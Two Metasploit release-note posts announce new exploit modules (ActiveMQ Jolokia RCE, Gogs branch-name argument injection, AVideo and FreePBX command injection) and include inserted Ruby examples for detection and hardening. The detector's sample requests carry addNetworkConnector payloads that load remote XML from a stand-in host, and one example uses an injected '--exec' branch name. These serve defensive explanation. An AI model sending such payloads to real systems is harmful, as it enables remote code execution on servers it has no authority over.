Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum

When Open Source is a bit too Open

Several fun modules landed this week, including an Apache ActiveMQ RCE, a Windows kernel pointer enumerator, and a Gogs RCE triggered by a branch name. Leading off is the Gogs RCE, which lets an attacker execute commands by naming a branch --exec <command> and then requesting a rebase.

Another useful post module, by CharlesQuinnDev, enumerates the kernel pointers leaked via the well-known NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several existing local privilege escalation exploits already rely on that leak, so breaking it out into a module of its own was a great call!

New module content (3)

Apache ActiveMQ RCE via Jolokia addNetworkConnector

Authors: dinosn and h00die
Type: Exploit
Pull request: #21497 contributed by h00die
Path: multi/http/apache_activemq_jolokia_rce
AttackerKB reference: CVE-2026-34197

Adds a new exploit module exploit/multi/http/apache_activemq_jolokia_rce targeting CVE-2026-34197 in Apache ActiveMQ. The module abuses the Jolokia JMX-over-HTTP API exposed at /api/jolokia/ by calling the addNetworkConnector() MBean operation with a crafted brokerConfig=xbean:http://... URI. ActiveMQ fetches the attacker-controlled URL and instantiates it as a Spring XML application context, achieving remote code execution via a java.lang.ProcessBuilder bean. Authentication is required to exploit this vulnerability.
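The detection side of the technique above, as an added example that is not part of the Metasploit module or of this post: a small Ruby checker that normalises Jolokia requests (JSON POST bodies, or the GET path form with Jolokia's "!/" escaping) and flags an exec of addNetworkConnector whose argument carries a remote xbean: URI. The sample requests are constructed, the exact connector-URI layout used by the real exploit is assumed, and the Jolokia request shapes are the documented ones; the point is that a legitimate network connector points at another broker's transport, never at an XML document over HTTP.

```ruby
require 'json'
require 'cgi'

# A brokerConfig that tells the broker to fetch its XML from somewhere remote.
REMOTE_XBEAN = %r{xbean:(?:https?|ftp)://}i

# Jolokia GET requests escape '/' inside a path segment as '!/' and '!' as '!!'.
# Split the part of the path after /exec/ into segments, honouring those escapes.
def split_jolokia_segments(remainder)
  segments = []
  current = +''
  i = 0
  while i < remainder.length
    ch = remainder[i]
    if ch == '!' && i + 1 < remainder.length
      current << remainder[i + 1]
      i += 2
    elsif ch == '/'
      segments << current
      current = +''
      i += 1
    else
      current << ch
      i += 1
    end
  end
  segments << current
end

# Normalise one Jolokia request (JSON POST body, or GET path when no body) into
# a list of { type:, operation:, arguments: } hashes. Bulk POSTs are arrays.
def parse_jolokia(path, body = nil)
  if body && !body.strip.empty?
    parsed = JSON.parse(body)
    parsed = [parsed] unless parsed.is_a?(Array)
    parsed.select { |r| r.is_a?(Hash) }.map do |r|
      { type: r['type'].to_s, operation: r['operation'].to_s,
        arguments: Array(r['arguments']).map(&:to_s) }
    end
  elsif (m = path.match(%r{/exec/(.+)\z}))
    segments = split_jolokia_segments(CGI.unescape(m[1]))
    return [] if segments.length < 2
    [{ type: 'exec', operation: segments[1], arguments: segments[2..] }]
  else
    []
  end
rescue JSON::ParserError
  []
end

# The signal: an exec of addNetworkConnector whose argument carries a remote
# xbean: URI. A real network connector points at another broker's transport
# (tcp://, static://, multicast://), not at an XML file over HTTP.
def remote_network_connector?(req)
  req[:type].casecmp?('exec') &&
    req[:operation] == 'addNetworkConnector' &&
    req[:arguments].any? { |arg| REMOTE_XBEAN.match?(arg) }
end

def flag_requests(requests)
  requests.flat_map { |r| parse_jolokia(r[:path], r[:body]) }
          .select { |req| remote_network_connector?(req) }
end

# Constructed sample traffic, not captured from a real broker. The exact
# connector-URI layout of the real exploit is assumed; only the remote xbean:
# reference inside an addNetworkConnector call matters to the check.
SAMPLE_REQUESTS = [
  { path: '/api/jolokia/',
    body: '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",' \
          '"operation":"addNetworkConnector",' \
          '"arguments":["static:(tcp://10.0.0.2:61616)?brokerConfig=xbean:http://203.0.113.5/broker.xml"]}' },
  { path: '/api/jolokia/',
    body: '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","attribute":"BrokerVersion"}' },
  { path: '/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/static:(tcp:!/!/10.0.0.3:61616)' },
  { path: '/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/xbean:https:!/!/203.0.113.5!/evil.xml' }
]

if __FILE__ == $PROGRAM_NAME
  flag_requests(SAMPLE_REQUESTS).each do |hit|
    puts "ALERT addNetworkConnector with remote brokerConfig: #{hit[:arguments].join(' ')}"
  end
end
```

Because the page notes the operation needs authentication, a hit here also tells you which web-console credentials were used, which is the first thing to rotate.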

Gogs Git Rebase Argument Injection RCE

Author: Crypto-Cat
Type: Exploit
Pull request: #21515 contributed by jburgess-r7
Path: multi/http/gogs_rebase_rce

This adds an exploit module for the Gogs rebase Remote Code Execution (RCE) vulnerability. The module leverages an argument injection flaw residing in the pull request merge workflow of Gogs versions <= 0.14.2 and <= 0.15.0+dev.
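To make the root cause concrete, here is an added Ruby illustration (not Gogs' own code, and not the module): the unvalidated argv shape in which a branch name beginning with a dash reaches git's option parser, beside a hardened version that applies a subset of the git check-ref-format rules and places "--" before the operands. The rules are git's published refname rules; the function names and the "--exec id" sample name are this example's own.

```ruby
# Subset of the rules `git check-ref-format` applies to a refname. A name that
# fails them must never be placed on a git command line.
FORBIDDEN_REF_CHARS = /[\x00-\x20\x7f~^:?*\[\\]/

def valid_ref_name?(name)
  return false if name.nil? || name.empty?
  return false if name.start_with?('-')            # git would read it as an option
  return false if name == '@' || name.include?('@{')
  return false if name.include?('..') || name.include?('//')
  return false if name.end_with?('/', '.')
  return false if FORBIDDEN_REF_CHARS.match?(name)
  name.split('/').none? { |part| part.start_with?('.') || part.end_with?('.lock') }
end

# The unvalidated shape: whatever the user called the branch lands in argv
# verbatim, so a name beginning with '-' is handed to git's option parser.
def naive_rebase_argv(upstream, branch)
  ['git', 'rebase', upstream, branch]
end

# Hardened shape: refuse anything that is not a well-formed refname, and put
# '--' before the operands so git's option parser stops looking for flags.
def rebase_argv(upstream, branch)
  [upstream, branch].each do |ref|
    raise ArgumentError, "refusing unsafe ref name: #{ref.inspect}" unless valid_ref_name?(ref)
  end
  ['git', 'rebase', '--', upstream, branch]
end

# True when an operand placed before any '--' would be parsed as an option.
def injected_option?(argv)
  argv.drop(2).take_while { |a| a != '--' }.any? { |a| a.start_with?('-') }
end

if __FILE__ == $PROGRAM_NAME
  p naive_rebase_argv('main', '--exec id')
  begin
    p rebase_argv('main', '--exec id')
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Validating at the point where the name enters the system (branch creation, pull request submission) is the durable fix; the "--" separator only protects the one command line it is written into.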

Windows Kernel Pointer Exposure Enumerator

Author: CharlesQuinnDev
Type: Post
Pull request: #21039 contributed by CharlesQuinnDev
Path: windows/gather/windows_kernel_pointer_enum

Adds a new post module for Windows that enumerates kernel object pointers exposed through NtQuerySystemInformation on x64 systems. The module collects observable handle metadata and provides analysis of pointer distribution, object types, and ALPC usage, then saves the results to a CSV loot file for review. Also introduces a reusable Windows kernel handle-enumeration library.

Enhancements and features (7)

  • #20881 from h00die - This adds support for cracking Kerberos-type hashes in Metasploit, specifically timeroasting, krb5tgs* and krb5asrep.
  • #21087 from jbx81-1337 - The new payloads_manager plugin lets you maintain a local archive of custom payloads and stage them into the data directory. Use the fetch or add subcommands to download or import a payload, then select to symlink it into place so it's available to other modules. The plugin tracks each payload's name, hash, tags, and description in a database.
  • #21412 from zeroSteiner - Updates Metasploit's post modules to now run by default against the last opened alive session, unless explicitly specified.
  • #21429 from zeroSteiner - Removes the now redundant Linux-specific method for finding the arch so there's a single source of truth that works in a superset of platform / session-type combinations.
  • #21488 from sjanusz-r7 - Updates HTTP login scanners to report the detected service hierarchy.
  • #21504 from h00die - Adds missing CVE references to seven existing modules: gladinet_storage_access_ticket_forge (CVE-2025-14611), cassandra_web_file_read (CVE-2020-36939), pretalx_file_read_cve_2023_28459 (CVE-2023-28459 and CVE-2023-28458), centreon_pollers_auth_rce (CVE-2019-19699), wp_responsive_thumbnail_slider_upload (CVE-2015-10144), xerte_unauthenticated_template_import_rce (CVE-2026-32985), and solarwinds_storage_manager_sql (CVE-2012-2576).
  • #21526 from zeroSteiner - Makes stability and logging improvements to the ipmi_cipher_zero, ipmi_dumphashes, and ipmi_version modules.

Bugs fixed (7)

  • #21432 from 4ravind-b - Fixes a bug in modules that invoke other modules that prevented datastore options from being validated.
  • #21448 from kx7m2qd - Fixes an issue where CIDR range filters in the addresses parameter of the db.hosts RPC endpoint were not processed correctly.
  • #21484 from zeroSteiner - Fixes python ssl command shell payloads that failed with AttributeError: module 'ssl' has no attribute 'wrap_socket'.
  • #21489 from h00die - Improves the GitLab version scanner by handling additional exceptions in the scanner for non-GitLab targets and adding additional version fingerprints for real GitLab targets.
  • #21502 from h00die - Fixes a crash in the scanner/snmp/snmp_enum module when the system date was read as Null.
  • #21506 from h00die - Adds a guard clause when running uname -r in WSL startup_folder persistence.
  • #21514 from orbit-bot - Fixes a couple of references to outdated msfvenom options.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Wrap-Up 03/20/2026

20 March 2026 at 16:03

♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫

This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo Encoder's getImage.php file and another targeting FreePBX. Leading the enhancements is finer-grained control over LDAP security descriptor queries, allowing the SACL to be left out of the request: without the proper permissions, a query for a security descriptor fails entirely if the SACL is even part of it.

New module content (2)

AVideo Encoder getImage.php Unauthenticated Command Injection

Authors: Valentin Lobstein (chocapikk@leakix.net) and arkmarta
Type: Exploit
Pull request: #21076 contributed by Chocapikk
Path: linux/http/avideo_encoder_getimage_cmd_injection
AttackerKB reference: CVE-2026-29058

Description: Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder's getImage.php endpoint.

FreePBX filestore authenticated command injection

Authors: Cory Billington and Valentin Lobstein (chocapikk@leakix.net)
Type: Exploit
Pull request: #20719 contributed by Chocapikk
Path: unix/http/freepbx_filestore_cmd_injection
AttackerKB reference: CVE-2025-64328

Description: Adds a new Metasploit exploit module for the FreePBX filestore authenticated command injection (CVE-2025-64328), with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX, updating the affected modules accordingly.

Enhancements and features (2)

  • #20730 from zeroSteiner - This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
  • #20997 from Nayeraneru - This adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.
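The mechanism behind the #20730 SACL change, as an added Ruby illustration rather than the ldap_query module's own code: the standard way to tell a domain controller which parts of nTSecurityDescriptor to return is the LDAP_SERVER_SD_FLAGS_OID control, whose value is a BER SEQUENCE holding one INTEGER of flag bits. Owner, group and DACL are readable with ordinary READ_CONTROL access, while the SACL requires ACCESS_SYSTEM_SECURITY (SeSecurityPrivilege), which a normal domain user does not hold. The query_sacl: keyword below stands in for an opt-in such as LDAP::QuerySacl; the function names and the criticality choice are this example's assumptions.

```ruby
# LDAP_SERVER_SD_FLAGS_OID control (MS-ADTS section 3.1.1.3.4.1.11). Its value is
# a BER SEQUENCE wrapping one INTEGER whose bits select which parts of
# nTSecurityDescriptor the DC should return.
SD_FLAGS_OID = '1.2.840.113556.1.4.801'
OWNER_SECURITY_INFORMATION = 0x1
GROUP_SECURITY_INFORMATION = 0x2
DACL_SECURITY_INFORMATION  = 0x4
SACL_SECURITY_INFORMATION  = 0x8

# Owner, group and DACL by default; the SACL only on explicit request, since
# reading it needs ACCESS_SYSTEM_SECURITY (SeSecurityPrivilege) on the object.
def sd_flags(query_sacl: false)
  flags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION
  flags |= SACL_SECURITY_INFORMATION if query_sacl
  flags
end

# Minimal BER encoder for SEQUENCE { INTEGER flags }. All four flags fit in one
# byte below 0x80, so no multi-byte length or sign-padding handling is needed.
def sd_flags_control_value(query_sacl: false)
  flags = sd_flags(query_sacl: query_sacl)
  raise ArgumentError, 'flags must fit a single positive BER byte' unless flags.between?(0, 0x7f)
  integer = [0x02, 0x01, flags].pack('C*')
  [0x30, integer.bytesize].pack('C*') + integer
end

# The control as it would be attached to a search request. Criticality is set
# so a server that does not support the control rejects the search instead of
# silently returning descriptors with unexpected parts.
def sd_flags_control(query_sacl: false)
  { oid: SD_FLAGS_OID, criticality: true, value: sd_flags_control_value(query_sacl: query_sacl) }
end

# Reverse direction, for inspecting a control value seen on the wire.
def decode_sd_flags(value)
  b = value.bytes
  unless b.length == 5 && b[0] == 0x30 && b[1] == 3 && b[2] == 0x02 && b[3] == 1
    raise ArgumentError, 'expected SEQUENCE { INTEGER } with a one-byte value'
  end
  b[4]
end

def sd_flags_requested(flags)
  { owner: (flags & OWNER_SECURITY_INFORMATION) != 0,
    group: (flags & GROUP_SECURITY_INFORMATION) != 0,
    dacl:  (flags & DACL_SECURITY_INFORMATION) != 0,
    sacl:  (flags & SACL_SECURITY_INFORMATION) != 0 }
end

if __FILE__ == $PROGRAM_NAME
  [false, true].each do |sacl|
    value = sd_flags_control_value(query_sacl: sacl)
    puts "query_sacl=#{sacl}: #{value.unpack1('H*')} -> #{sd_flags_requested(decode_sd_flags(value))}"
  end
end
```

Without the SACL bit the DC hands back owner, group and DACL to any reader with READ_CONTROL, which is what an unprivileged enumeration run needs; set it only when the account is known to hold SeSecurityPrivilege.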

Bugs fixed (7)

  • #20960 from g0tmi1k - This adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.
  • #21020 from g0tmi1k - This makes a small change to the docs by removing two lines that were previously duplicated.
  • #21024 from Aaditya1273 - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.
  • #21025 from Hemang360 - Fixes a crash when calling the HTTP cookie jar with non-string values.
  • #21028 from SilentSobs - Fixes a crash when using the reload_all command while no module is present.
  • #21081 from Hemang360 - Fixes a crash when using the windows/exec payload with non-ASCII characters.
  • #21139 from jheysel-r7 - This fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.

Documentation added (1)

  • #21074 from jeanmtr - Adds documentation for the pop3_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.
